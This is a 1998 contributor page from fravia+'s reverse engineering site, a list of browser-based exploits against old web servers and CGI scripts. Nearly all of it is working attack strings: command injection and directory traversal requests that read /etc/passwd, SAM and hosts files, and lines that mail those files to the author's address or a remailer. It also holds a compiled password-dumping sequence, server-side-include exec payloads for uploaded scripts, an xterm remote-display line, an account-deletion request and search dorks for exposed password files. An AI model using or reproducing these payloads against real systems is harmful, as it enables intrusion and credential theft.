courtesy of fravia+'s page of reverse engineering
12 November 1998
hi fravia+,
this is my collection of "how to exploit weak sites with your browser"
i'm working an a document which includes very new exploits .. i'll let you
know when it is ready ...
haveaniceday
RUDICARELL
# test cgi's
/cgi-bin/test-cgi?\whatever
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/test-cgi?x *
/cgi-bin/nph-test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?x *
# jj
/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls
# betterones
/cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com
</etc/passwd)
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?%0a blablabla
&Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat
hosts;set)\|echo;echo|
# other stuff
/dir/doit.phtml?/home/ftp/incoming/executemycode.phtml
/cgi-bin/AnyForm2? ...???
/cgi-bin/infogate? ...???
/cgi-bin/test.bat?&dir .... netscape server
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape
server
# microfuck
/guti.asp::$DATA asp ......
/global.asa asp ......
# long filenames :)
/somewhere/VERYLON~.HTM .... user save verylongyy.htm file
# quid pro quo server
/site.name/server%20logfile .... quid pro quo - server
# basic auth and others
/cgi-bin/www-sql/protected_directory/irgendwas.html
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cool-logs/mlog.html?screen=/etc/passwd
/cool-logs/mylog.html?screen=/etc/passwd
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/webgais
Content-length: (laenge des exploits)
query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph
# sgi silicon graphics
/cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! nur
tabs!)
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!)
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! alte version)
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo
# frontpage extensions
www.domain.com/beliebiges_directory/_vti_cnf = directory
www.domain.com/_vti_pvt = world writeable
# old but still working IIS perl.exe
nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');"
# example bor bad perl oa
;xterm -display my.ip.address:0 &
john;echo "#include \"pwd.h\"">/tmp/shadow.c
john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c
john;echo
"printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c
john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c
john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c
john;cc -o /tmp/shadow /tmp/shadow.c
john;/tmp/shadow>>/tmp/passwd
john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com
john;rm /tmp/shadow*;rm /tmp/passwd
# sometimes its really bad
~root
~root/etc/passwd (zum beispiel)
altavista .... url:etc AND link:passwd ... oder ... root: 0:0
url:.htaccess .. oder .. url:.htpasswd
# NCSA files
httpd.conf configure the httpd service
srm.conf scripts and documents reside
access.conf service features for all browsers
.htaccess Limits access on a directory-by-directory basis
http .... bla bla /.htaccess (NCSA .........)
# microfuck
http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time
test.bat+%26dir+%26time+%26pfieffer.exe
# novell
http ... bla bla .. /files.pl? ../../blabla
http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume
# MAC WEBSTAR
http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N
# lotus domino server (this is really cool)
http ... /domcfg.nsf/?open
htto ... /domcfg.nsf/URLRedirect/?OpenForm
http:... /database.nsf/viewname?SearchView&Query="*"
# nt carbo server ****
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
#example for server side includes anon-ftp upload****
<!--#exec cmd="/bin/ls"-->
<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->
<!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="find / -name foobar -print"-->
<!--#include file="schweinenasenfile" -->
# metaweb servers
http://mail.server.com:5000/../smusers.txt
http://mail.server.com:5000/../../winnt/repair/sam._
http://mail.server.com:5000/../../winnt/system32/net.exe?
http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete
port:2040 = javaconfig
port:5000 = mail
port:5001 = -"-
http://www.metainfo.com/products/sendmail/users.htm
http://www.metainfo.com/products/metaip/users.htm
# verity search software ******
s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt)
search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
# uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt ****
wwwadmin.pl oder wwwadmin.cgi
# cgi von hylafax ***
/cgi-bin/faxsurvey?/bin/ls%20-a
# other microfuck
uploader.exe/
# new lotus-domino
http://www.server.com/database.nsf/viewname?SearchView&Query="*"
/*end*/
homepage
links
+ORC
most recent essays
anonymity
counter measures
bots wars
CGI antismut
cocktails
search_forms
history of this site
AntiMicro$oft
mail_fravia
Is reverse engineering legal?